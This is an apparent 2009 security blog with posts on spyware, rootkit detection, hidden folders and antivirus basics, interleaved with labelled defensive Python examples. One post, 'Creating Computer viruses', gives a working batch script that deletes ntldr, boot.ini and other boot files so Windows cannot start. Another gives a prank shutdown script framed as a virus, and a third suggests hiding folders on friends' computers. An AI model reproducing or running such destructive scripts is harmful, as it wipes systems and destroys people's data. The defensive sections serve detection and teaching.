The blog contains information about different types of viruses and properties of viruses.
Monday, July 27, 2009
RootkitRevealer
Now it's time to look into the software section. Let us look at a small program called RootkitRevealer. It doesn't need to be installed: just double-click the icon, agree to the terms and conditions, and the software is ready to use. It is designed to run on Windows NT or higher editions of Windows. RootkitRevealer is an advanced rootkit detection utility, and its output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit. RootkitRevealer is capable of detecting many persistent rootkits, including AFX, Vanquish and HackerDefender. RootkitRevealer is not intended to detect rootkits like Fu that don't attempt to hide their files or registry keys. Since persistent rootkits work by changing API results so that a system view using APIs differs from the actual view in storage, RootkitRevealer compares the results of a system scan at the highest level with that at the lowest level. The highest level is the Windows API and the lowest level is the raw contents of a file system volume or Registry hive. A hive file is the Registry's on-disk storage format. Thus, rootkits, whether user mode or kernel mode, that manipulate the Windows API or native API to remove their presence from a directory listing, for example, will be seen by RootkitRevealer as a discrepancy between the information returned by the Windows API and that seen in the raw scan of a FAT or NTFS volume's file system structures. You can download it from http://filehippo.com/download_rootkit_revealer/tech/
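The high-level versus low-level comparison described above can be sketched as a set difference between two listings. This is an added example, not RootkitRevealer's code: both views are constructed sample data, the `hidden_sample` names are hypothetical, and the result labels are this example's own.

```python
# Added illustration of cross-view detection; not RootkitRevealer's code.
# NTFS metadata files sit in the volume root and are never returned by the
# Windows API, so a raw scan always shows them without a rootkit present.
NTFS_METADATA = {"$mft", "$mftmirr", "$logfile", "$volume", "$attrdef",
                 "$bitmap", "$boot", "$badclus", "$secure", "$upcase", "$extend"}

# Constructed sample data: what the API enumeration returned ...
API_VIEW = [
    r"C:\Windows\System32\drivers\etc\hosts",
    r"C:\Windows\System32\notepad.exe",
    r"C:\Temp\scan.tmp",
    r"HKLM\SOFTWARE\Example\Run",
]
# ... and what a raw parse of the volume and hive files returned.
RAW_VIEW = [
    r"C:\WINDOWS\system32\drivers\etc\hosts",
    r"C:\Windows\System32\notepad.exe",
    r"C:\$MFT",
    r"C:\Windows\System32\hidden_sample.sys",
    r"HKLM\SOFTWARE\Example\Run",
    r"HKLM\SYSTEM\CurrentControlSet\Services\hidden_sample",
]

def normalise(path):
    # File and Registry names are case-insensitive on Windows.
    return path.replace("/", "\\").rstrip("\\").lower()

def is_ntfs_metadata(path):
    parts = normalise(path).split("\\")
    return len(parts) == 2 and parts[1] in NTFS_METADATA

def cross_view_diff(api_view, raw_view):
    """Return (path, label) for every entry present in only one view."""
    api = {normalise(p): p for p in api_view}
    raw = {normalise(p): p for p in raw_view}
    findings = []
    for key in sorted(raw.keys() - api.keys()):
        label = "expected NTFS metadata" if is_ntfs_metadata(key) else "hidden from API"
        findings.append((raw[key], label))
    for key in sorted(api.keys() - raw.keys()):
        # Usually a file created or deleted while the scan was running.
        findings.append((api[key], "API only"))
    return findings

def suspicious(findings):
    return [path for path, label in findings if label == "hidden from API"]

if __name__ == "__main__":
    for path, label in cross_view_diff(API_VIEW, RAW_VIEW):
        print(f"{label:24} {path}")
```

Entries labelled "hidden from API" are the discrepancies worth investigating; the other two labels are the usual sources of noise in a cross-view scan.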
Saturday, July 25, 2009
How to create an invisible folder
You may have private details on your computer that you don't want your friends to access. There is software available on the market for protecting a folder with a password, but you may be in trouble if the password is lost. There is another way to hide folders from your friends: a common technique for creating invisible folders. The advantage of this method is that you need no software for it. Follow the steps given below:
1. Select the folder you want to make invisible.
2. Press F2 or right-click on the folder and choose Rename.
3. Press and hold the Alt key and enter 255 using the number pad (turn on Num Lock and use the number pad on the right-hand side), then release the Alt key.
4. Press Enter. Now the folder appears to be a nameless folder.
5. What is the next step? Making the icon invisible. For that, right-click on the folder and select Properties.
6. Select the Customize tab and click on the Change Icon button.
7. A new window containing several icons appears. Select an invisible icon from the window and then press the OK button in both open windows. Now the invisible folder is ready.
You can use this to have fun with your friends by hiding folders on their computers.
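A folder renamed this way is not protected, only hard to see: its name is a single blank character (Alt+255 normally yields the no-break space, U+00A0), and any listing that prints code points exposes it. The following added example, which is not part of the original post, walks a directory tree and reports names made up solely of blank or invisible characters; the category set it uses is this example's own choice.

```python
# Added illustration: find files and folders whose names render as blank.
import os
import sys
import unicodedata

# Unicode general categories that draw nothing on screen:
# space/line/paragraph separators, format characters, control characters.
BLANK_CATEGORIES = {"Zs", "Zl", "Zp", "Cf", "Cc"}

def is_blank_name(name):
    """True if every character of a non-empty name is invisible."""
    return bool(name) and all(
        ch.isspace() or unicodedata.category(ch) in BLANK_CATEGORIES
        for ch in name
    )

def describe(name):
    """Render a name as code points so a blank name becomes readable."""
    return " ".join("U+%04X" % ord(ch) for ch in name)

def find_blank_named(root):
    """Return sorted (full_path, code_points) for blank-named entries under root."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if is_blank_name(name):
                hits.append((os.path.join(dirpath, name), describe(name)))
    return sorted(hits)

if __name__ == "__main__":
    start = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, code_points in find_blank_named(start):
        print(f"{code_points:20} {path!r}")
```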
Friday, July 24, 2009
Google trying to put an end to computer virus....
After the release of the operating system, Google is trying to put an end to the computer virus. Its engineering experts are studying the flaws in existing operating systems and the measures needed to overcome their limitations. If Google's venture is realized, it would mark the beginning of a new era in the cyber world. It has been learnt that Linus Upson, Google's Engineering Director, has promised the company is: "Completely redesigning the underlying security architecture of the OS so users don't have to deal with viruses, malware and security updates. It should just work." Google's dominance among its competitors increases the chance of success. Google's open source policy also supports this argument. But historically, the release of the Windows NT operating system threatened several antivirus firms, since there was a rumor that all the security flaws of the previous versions of Windows had been solved and that no virus could harm a computer running Windows NT; the result went against the rumor. There are several challenges before Google. Security flaws have been reported in the Chrome web browser, and two of them have already been solved. We can expect an operating system free from viruses and malware, free of cost.
Wednesday, July 22, 2009
Spyware (Part - 3)
Let us see the ways in which spyware infects a computer. Spyware on a computer does not try to infect other computers the way viruses, worms or trojans do. It just collects the user's details and sends them to a particular person or firm via the internet. Spyware usually gets installed on the computer without the knowledge of the user. It usually comes with a useful piece of software. When the user installs the software without knowing that it contains spyware, the spyware gets installed on the computer and sends out the details about the user stored on the computer. This violates the user's privacy on the internet. The manufacturer usually presents the spyware as useful software. The common categories of such software include themes, games, and internet utilities such as download accelerators, web boosters etc. Many Internet users were introduced to spyware in 1999, when a popular freeware game called "Elf Bowling" came bundled with tracking software. The cookie is a well-known mechanism for storing information about an internet user on their own computer. If a website stores information about you in a cookie that you don't know about, the cookie can be considered a form of spyware.
Another way of installing is by using the vulnerabilities in the security software provided to block this spyware. This is done by making the user click on a link disguised as a pop-up that asks anything that will get the user to click on it, which triggers the installation of the spyware. In a few cases, a worm or virus has delivered a spyware payload. Some attackers used the Spybot worm to install spyware that put pornographic pop-ups on the infected system's screen. By directing traffic to ads set up to channel funds to the spyware authors, they profit personally.
Tuesday, July 21, 2009
Creating Computer viruses
In this post I will show how to create a more dangerous application. Activating it will shut down the computer after deleting the files required for booting, and the computer will not boot on restart. So handle it with care, otherwise it will end in a permanent crash. Please do not use this to harm others. I found it on Garena.com.
Open a notepad and type the following and save it as "filename.bat" file.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
How to make a Virus for fun
While I was searching the internet for the latest information about computer viruses, I came across a site that tells how to make a simple virus for fun. Its link is: http://ardiansyahputra.wordpress.com/2008/08/23/create-a-harmless-virus-in-notepad-cara-membuat-virus-jinak-di-notepad/
I have put it here for you. It can be edited according to your wish. However, I didn't edit it, as it is his work. Please do not use this for any malpractice.
Step 1.
Open a notepad
Step 2.
Type the following codes in the notepad.
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………! properties -> options -> full screen
Step 4 is not necessary. But it will magnify the effect.
Step 5.
Yes, that is the only step remaining: activate it by double-clicking on the icon.
To abort the virus so that your PC does not shut down, click START – RUN and type the command: shutdown -a before the remaining time is over.
look at the fig. below
Monday, July 20, 2009
Spyware (Part - 2)
Now let us look into a short history of spyware. I have searched several sites for the history of spyware. Wikipedia provides good and clear information on it. I have extracted some parts of the history of spyware here just for you. The first known use of the word spyware was on October 16, 1995, and it was directed against Microsoft's business model. Spyware was first taken to mean hardware meant for espionage purposes. In early 2000, the founder of Zone Labs, Gregor Freund, used the term spyware during the release of the ZoneAlarm Firewall. Since then the term has been used in its present sense. As of 2006, spyware has become one of the prominent security threats to computers using Microsoft Windows operating systems. Computers on which Internet Explorer (IE) is the primary browser are particularly vulnerable to such attacks. This is not only because IE is the most widely used browser, but because its tight integration with Windows allows spyware access to crucial parts of the operating system.
Before Internet Explorer 7 was released, the browser would display a message saying that ActiveX must be installed to view a particular section of the website or the whole website. But in most cases the spyware would be disguised as ActiveX. The combination of user naiveté towards malware and the assumption by Internet Explorer that all ActiveX components are benign led, in part, to the massive spread of spyware. Many spyware components would also make use of exploits in JavaScript, Internet Explorer and Windows to install without user knowledge or permission. After installation, Windows sometimes pops up warning messages about the presence of the spyware on the computer.
The Windows Registry contains multiple sections where modifying key values allows software to be executed automatically when the operating system boots. Spyware can exploit this design to circumvent attempts at removal. The spyware typically will link itself from each location in the registry that allows execution. Once running, the spyware will periodically check if any of these links are removed. If so, they will be automatically restored. This ensures that the spyware will execute when the operating system is booted even if some (or most) of the registry links are removed.
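Both behaviours described above leave a trace that a cleanup routine can check for: one command registered under several autostart locations, and entries that come back after being deleted. The following added example, not from the original post, runs both checks over successive snapshots of autostart entries. The snapshots are constructed sample data, the "Updater" entry and its path are hypothetical, and collecting real snapshots is left out.

```python
# Added illustration: spot self-restoring autostart entries in snapshots.
RUN_HKLM = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_HKCU = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
AGENT = r"C:\ProgramData\sample\agent.exe"       # hypothetical suspect binary
AUDIO = r"C:\Program Files\Vendor\audio.exe"     # hypothetical benign entry

# Constructed snapshots: {(registry key, value name): command line}
SNAPSHOTS = [
    # 0: before cleanup
    {(RUN_HKLM, "Updater"): AGENT, (RUN_HKCU, "Updater"): AGENT,
     (RUN_HKLM, "AudioDriver"): AUDIO},
    # 1: right after the "Updater" values were deleted
    {(RUN_HKLM, "AudioDriver"): AUDIO},
    # 2: a few minutes later, with the suspect process still running
    {(RUN_HKLM, "Updater"): AGENT, (RUN_HKCU, "Updater"): AGENT,
     (RUN_HKLM, "AudioDriver"): AUDIO},
]

def multi_location_commands(snapshot):
    """Commands registered under more than one autostart key."""
    by_command = {}
    for (key, _name), command in snapshot.items():
        by_command.setdefault(command.lower(), set()).add(key)
    return {cmd: sorted(keys) for cmd, keys in by_command.items() if len(keys) > 1}

def reappearing_entries(snapshots):
    """Entries that were present, then missing, then present again.

    Returns sorted (snapshot_index, (key, value_name), command) tuples.
    """
    state = {}      # entry -> "present" or "removed"
    flagged = []
    for index, snap in enumerate(snapshots):
        for entry, command in snap.items():
            if state.get(entry) == "removed":
                flagged.append((index, entry, command))
            state[entry] = "present"
        for entry, status in state.items():
            if status == "present" and entry not in snap:
                state[entry] = "removed"
    return sorted(flagged)

if __name__ == "__main__":
    print("multi-location:", multi_location_commands(SNAPSHOTS[0]))
    for index, (key, name), command in reappearing_entries(SNAPSHOTS):
        print(f"snapshot {index}: {key}\\{name} restored -> {command}")
```

A restored entry means the process that rewrites it is still running, so that process has to be stopped before the registry values are removed.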
How to keep your PC virus free
You may be wondering whether there is any way to keep the PC free from virus infection. Here are some tips to keep the PC free from viruses:
To keep the PC free from computer viruses and other malicious applications, we mainly need three kinds of software:
1. Anti-virus
2. Anti Malware Software
3. Rootkit Remover
Now let us see why we have to use this software. Let us take the case of the anti-virus. As you know, anti-virus is used to find and destroy viruses. Knowing this, most computer users install anti-virus. But many of the people using anti-virus do not update it properly. This may put your PC in trouble. The anti-virus generally has two parts: 1. the virus signature database and 2. the anti-virus engine. Each virus has its own signature, just as a person has his own signature. The virus signature is nothing but a series of codes that is placed in every file the virus infects. This code is unique to that particular virus. So by simply comparing the virus signature with the data of a file, it is easier to detect the presence of the virus. Since more and more viruses are released into cyberspace daily, the anti-virus firms discover the signatures of the new viruses and put them on the internet for the user to download. When we update the anti-virus, these signatures are downloaded into its database, and the anti-virus gains the capability to detect the new viruses. The anti-virus engine compares the virus signatures in the signature database with the data of the files. If a match is found, the file is treated as an infected file, and the engine takes measures to prevent further infection, delete the virus and recover the original file. It also scans memory for the presence of the virus.
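The split between signature database and engine described above can be shown in a few lines. This is an added example, not code from any anti-virus product: the signature names and byte patterns are constructed, and plain byte-sequence matching is a simplification of what real engines do. The engine reads data in chunks and keeps a small overlap so that a signature split across two reads is still found.

```python
# Added illustration: a byte-signature engine and a database update.
import io

def scan_stream(stream, signatures, chunk_size=4096):
    """Return sorted names of signatures whose pattern occurs in the stream."""
    longest = max((len(p) for p in signatures.values()), default=0)
    found = set()
    tail = b""
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        window = tail + chunk
        for name, pattern in signatures.items():
            if name not in found and pattern in window:
                found.add(name)
        # Keep the last (longest - 1) bytes: enough to complete any pattern
        # that started in this read and finishes in the next one.
        tail = window[-(longest - 1):] if longest > 1 else b""
    return sorted(found)

def update_database(signatures, downloaded):
    """Return a new database with the downloaded signatures merged in."""
    merged = dict(signatures)
    merged.update(downloaded)
    return merged

# Constructed signature database (the patterns are arbitrary bytes).
DATABASE_V1 = {"Sample.A": bytes.fromhex("deadbeef0badf00d")}
# Constructed update published after "Sample.B" was discovered.
UPDATE = {"Sample.B": b"\x13\x37SAMPLE-B-MARKER\x00"}

# Constructed file contents.
CLEAN_FILE = b"MZ" + b"\x00" * 64
FILE_WITH_A = b"A" * 6 + DATABASE_V1["Sample.A"] + b"Z" * 10
FILE_WITH_B = b"header" + UPDATE["Sample.B"] + b"trailer"

if __name__ == "__main__":
    files = [("clean", CLEAN_FILE), ("a", FILE_WITH_A), ("b", FILE_WITH_B)]
    for label, database in (("before update", DATABASE_V1),
                            ("after update", update_database(DATABASE_V1, UPDATE))):
        for name, data in files:
            # chunk_size=8 forces patterns to straddle read boundaries
            hits = scan_stream(io.BytesIO(data), database, chunk_size=8)
            print(f"{label:14} {name:6} {hits}")
```

Run with the old database, the file containing the newer pattern is reported clean; after the update it is detected, which is why an anti-virus that is not updated misses new viruses.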
Using anti-virus will not guarantee the protection of the PC from all malicious software. For that purpose we have to use anti-malware software. Malwarebytes is one of the most common anti-malware programs used internationally. Anti-malware software scans the memory as well as the storage devices of the PC for malicious software. It can effectively remove almost all the malicious software on the PC. But there are some malware applications that survive the anti-malware software. We can use rootkit remover software to remove that type of application. Rootkits are capable of killing and hiding different processes running in the operating system. Some software, like Daemon Tools, uses rootkits but is not malicious. RootkitRevealer is a rootkit remover tool used today.
This software is not enough to keep your PC safe from all attacks if you have an internet connection. You must use a firewall to regulate internet usage by applications and to prevent unwanted packets from entering the PC. I prefer Sygate Firewall to the Windows firewall, since it allows blocking unwanted applications from accessing the internet. But do not use more than one firewall on a PC, since each firewall works on its own set of rules and they may clash if more than one is used.
Always use the Firefox 3.5 browser for more security. Add-ons should be downloaded only if they are marked as recommended. Do not install add-ons from a third party whom you do not trust.
Always download software from trusted sites like FileHippo, CNET, Brothersoft etc. Try to avoid downloading software from unfamiliar sites. I believe that these tips will help you to keep your PC clean.